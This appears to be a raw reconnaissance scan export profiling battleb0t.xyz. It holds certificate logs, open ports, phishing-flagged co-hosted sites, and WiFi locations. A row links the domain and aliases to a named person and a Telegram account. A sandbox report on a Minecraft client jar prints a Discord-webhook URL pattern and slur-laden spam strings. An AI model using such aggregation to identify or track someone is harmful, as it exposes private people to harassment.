u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:23:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.5:443 | 188.114.96.0/24 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01039402468.github.io] https://www.openphish.com/feed.txt | 01039402468.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: same-origin | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f605eb97732c7-EWR"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Telegram (Category: social) https://t.me/ayshoo | ayshoo |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | FurAffinity (Category: images) https://www.furaffinity.net/user/login | login |
| 2023-05-12 03:19:24 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.154:443 | 185.199.109.0/24 |
| 2023-05-12 02:56:25 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 14061 | 207.154.224.0/20 |
| 2023-05-12 02:53:52 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8003::153:443 | 2606:50c0:8003::153 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 010pixel.github.io | 185.199.111.153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 3 | 0 | None | http://www.ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60715ea2423d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '12933',
cRay: '7c5f60715ea2423d',
cHash: '4c530bdfb62a335',
cUPMDTk: "\/?__cf_chl_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA2Mi45MzcwMDA=',
m: 'LwOsDwqRkfr0bjyiLObl7sEK+vITUZuaPQE/A6GDF60=',
i1: 'zy3+9oq0kQS8g0MofYLvVQ==',
i2: 'Pt5t/C6ZQh8wsZRxhTvpYw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60715ea2423d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60715ea2423d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:00:55 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00ihsan.github.io | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:79:25:FC) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-4C62 (Net ID: 00:1D:D5:6D:4C:60) | 32.8608, -79.9746 |
| 2023-05-12 02:45:43 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.111.153 |
| 2023-05-12 02:44:09 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 1 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | battleb0t.xyz |
| 2023-05-12 02:58:02 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | | 34.148.97.127 |
| 2023-05-12 02:44:03 | Human Name | No | SpiderFoot UI | 2 | 0 | 0 | 0 | None | Dawid Sulej | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.com | www.battleb0t.xyz |
| 2023-05-12 03:19:22 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.153:443 | 185.199.109.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | steg (Net ID: 00:01:36:06:3F:F8) | 52.3759, 4.8975 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01.github.io]
https://www.openphish.com/feed.txt | 01.github.io |
| 2023-05-12 02:49:55 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'kamiblue-2.04.21-3c581c22b.jar', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-159', u'name': u'Writes log files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1074/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1074.001', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"javaw.exe" writes a file "C:\\hs_err_pid4552.log"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"hs_err_pid4552.log" has type "ASCII text with CRLF line terminators"- Location: [C:\\hs_err_pid4552.log]- [targetUID: 00000000-00004552]\n "cce3fe3b0d8d80bc.timestamp" has type "ASCII text with CRLF line terminators"- Location: [%ALLUSERSPROFILE%\\Oracle\\Java\\.oracle_jre_usage\\cce3fe3b0d8d80bc.timestamp]- [targetUID: 00000000-00004552]'}, {u'category': u'Environment Awareness', u'origin': u'Hybrid Analysis Technology', u'identifier': u'stream-3', u'name': u'Contains ability to 
query the machine version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1082', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-312', u'attck_id': u'T1082', u'relevance': 1, u'threat_level': 0, u'type': 1, u'description': u'INSTANCE.getVersionsFolder@FolderUtils at cb617139dd424aa668b0102de6fd5feb-20db3'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:"assets/minecraft/kamiblue/kamimap.png" [Source: 76315e9082d7feae78e5a979537cb15491e33364ab9be90c74a65e132066521f.bin]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 185.199.110.153 on port 443"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic 
match: "#rHehV=Bm.nO"\n Heuristic match: "null cannot be cast to non-null type kotlin.Int"\n Heuristic match: "int, kotlin.Int"\n Heuristic match: "java.lang.Integer, kotlin.Int"\n Pattern match: "https://api.mojang.com/user/profiles/"\n Pattern match: "https://api.mojang.com/users/profiles/minecraft/"\n Pattern match: "https://github.com/cabaletta/baritone/blob/master/USAGE.md"\n Pattern match: "https://www.youtube.com/channel/UCJGCNPEjvsCn0FKw3zso0TA"\n Pattern match: "discord.com/invite"\n Heuristic match: "player.name"\n Pattern match: "https://kamiblue.org/download"\n Pattern match: "https://kamiblue.org/api/v1/downloads.json"\n Heuristic match: "entity.name"\n Pattern match: "https://2bqueue.info/queue"\n Heuristic match: "Cannot connect to 2bqueue.info"\n Heuristic match: "file.name"\n Pattern match: "https://raw.githubusercontent.com/kami-blue/cape-api/capes/capes.json"\n Heuristic match: "it.name"\n Pattern match: "https://github.com/kami-blue"\n Pattern match: "https://kamiblue.org"\n Heuristic match: "kamiblue/modules.md"\n Pattern match: "https://api.github.com/repos/kami-blue/client/contributors"\n Pattern match: "github.com/kami-blue/client/graphs/contributors"\n Pattern match: "https://youtu.be/yPYZpwSpKmA"\n Pattern match: "https://kamiblue.org/backdoored"\n Pattern match: "kamiblue.org/license"\n Heuristic match: "waypoint.name"\n Pattern match: "https://kamiblue.org/discord"\n Pattern match: "https://.*discord(app|)\\\\.com/api/webhooks/\\\\d+/.{68}$"\n Heuristic match: "schematicArg.value.name"\n Heuristic match: "it.id"\n Pattern match: "https://raw.githubusercontent.com/2b2t-Utilities/emojis/master/version.json"\n Pattern match: "https://github.com/2b2t-Utilities/emojis/archive/master.zip"\n Heuristic match: "entry.name"\n Pattern match: "http://bugreport.java.com/bugreport/crash.jsp"\n Pattern match: "www.http.HttpClient.openServer(Ljava/lang/String;I)V+4"\n Pattern match: "www.http.HttpClient.openServer()V+114"\n Pattern match: 
"www.protocol.https.HttpsClient"\n Pattern match: "www.protocol.https.HttpsClient.New(Ljavax/net/ssl/SSLSocketFactory;Ljava/net/URL;Ljavax/net/ssl/HostnameVerifier;Ljava/net/Proxy;ZILsun/net/www/protocol/http/HttpURLConnection;)Lsun/net/www/http/HttpClient;+355"\n Pattern match: "www.protocol.https.AbstractDelegateHttpsURLConnection.getNewHttpClient(Ljava/net/URL;Ljava/net/Proxy;I)Lsun/net/www/http/HttpClient;+13"\n Pattern match: "www.protocol.http.HttpURLConnection.plainConnect0()V+357"\n Pattern match: "www.protocol.http.HttpURLConnection.plainConnect()V+71"\n Pattern match: "www.protocol.https.AbstractDelegateHttpsURLConnection.connect()V+9"\n Pattern match: "www.protocol.http.HttpURLConnection.getInputStream0()Ljava/io/InputStream;+195"\n Pattern match: "www.protocol.http.HttpURLConnection.getInputStream()Ljava/io/InputStream;+52"\n Pattern match: "www.protocol.https.HttpsURLConnectionImpl.getInputStream()Ljava/io/InputStream;+4"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-98', u'name': u'Possibly tries to communicate over SSL connection (HTTPS)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"https://api.mojang.com/user/profiles/" + UUIDUtils.INSTANCE.removeDashes(uuid) + "/names" (Indicator: "https://")\n "https://api.mojang.com/users/profiles/minecraft/" (Indicator: "https://")\n "Invalid Command! 
Please view possible commands at https://github.com/cabaletta/baritone/blob/master/USAGE.md" (Indicator: "https://")\n ".+ Download WWE utility mod, Its free!"\n ".+ 4b4t is da best mintscreft serber"\n ".+ dont abouse"\n ".+ you cuck"\n ".+ https://www.youtube.com/channel/UCJGCNPEjvsCn0FKw3zso0TA"\n ".+ is my step dad"\n ".+ again daddy!"\n "dont worry .+ it happens to every one"\n ".+ dont buy future it\'s crap, compared to WWE!"\n "What are you, fucking gay, .+?"\n "Did you know? .+ hates you, .+"\n "You are literally 10, .+"\n ".+ finally lost their virginity, sadly they lost it to .+... yeah, that\'s unfortunate."\n ".+, don\'t be upset, it\'s not like anyone cares about you, fag."\n ".+, see that rubbish bin over there? Get your ass in it, or I\'ll get .+ to whoop your ass."\n ".+, may I borrow that dirt block? that guy named .+ needs it..."\n "Yo, .+, btfo you virgin"\n "Hey .+ want to play some High School RP with me and .+?"\n ".+ is an Archon player. Why is he on here? Fucking factions player."\n "Did you know? .+ just joined The Vortex Coalition!"\n ".+ has successfully conducted the cactus dupe and duped a itemhand!"\n ".+, are you even human? You act like my dog, holy shit."\n ".+, you were never loved by your family."\n "Come on .+, you hurt .+\'s feelings. You meany."\n "Stop trying to meme .+, you can\'t do that. kek"\n ".+, .+ is gay. Don\'t go near him."\n "Whoa .+ didn\'t mean to offend you, .+."\n ".+ im not pvping .+, im WWE\'ing .+."\n "Did you know? .+ just joined The Vortex Coalition!"\n ".+, are you even human? You act like my dog, holy shit." 
(Indicator: "https://")\n "https://kamiblue.org/download" (Indicator: "https://")\n "https://kamiblue.org/api/v1/downloads.json" (Indicator: "https://")\n "https://2bqueue.info/queue" (Indicator: "https://")\n "https://kamiblue.org/api/v1/downloads.json")\n "\\n"\n "" (Indicator: "https://")\n "https://raw.githubusercontent.com/kami-blue/cape-api/capes/capes.json" (Indicator: "https://")\n "https://github.com/kami-blue" (Indicator: "https://")\n "https://kamiblue.org" (Indicator: "https://")\n "https://api.github.com/repos/kami-blue/client/contributors" (Indicator: "https://")\n "Failed to retrieve contributors from Github API.\\nCheckout the page manually: &9https://github.com/kami-blue/client/graphs/contributors" (Indicator: "https://")\n "https://youtu.be/yPYZpwSpKmA" (Indicator: "https://")\n "https://kamiblue.org/backdoored" (Indicator: "https://")\n "You can view KAMI Blue\'s &7client&f License (LGPLv3) at &9https://kamiblue.org/license" (Indicator: "https://")\n "General FAQ:\\nHow do I see all commands? - " + TextFormattingKt.formatValue(HelpCommand.access$getCompanion$p$s-2125338400().getPrefix() + INSTANCE.getName() + " commands") + "\\nHow do I use Baritone? - " + TextFormattingKt.formatVal | 185.199.110.153 |
| 2023-05-12 02:50:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:3a:9d:01:de:8f:db:a2:52:4a:02:0c:18:70:da:44:dd:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:50:47 2023 GMT
Not After : Jun 11 12:50:46 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:86:d1:c6:73:d4:68:16:b7:b8:27:02:2e:0a:
3b:ac:b2:c0:cf:5d:bb:e0:97:62:4b:2d:4c:a7:8a:
0f:bb:28:62:25:f7:8b:c2:a2:9f:9f:a4:09:ae:64:
46:ad:01:04:9a:1c:e2:d3:da:ff:2f:0b:66:3e:17:
93:38:08:7c:21:35:76:62:9b:3d:79:67:17:13:fe:
36:e3:cb:d3:f1:13:27:de:39:d4:be:26:b9:a7:bc:
48:6c:32:02:59:5e:42:77:18:cd:f0:52:6e:ff:59:
03:7e:1d:11:be:bc:ab:d2:7f:d2:95:33:32:9e:74:
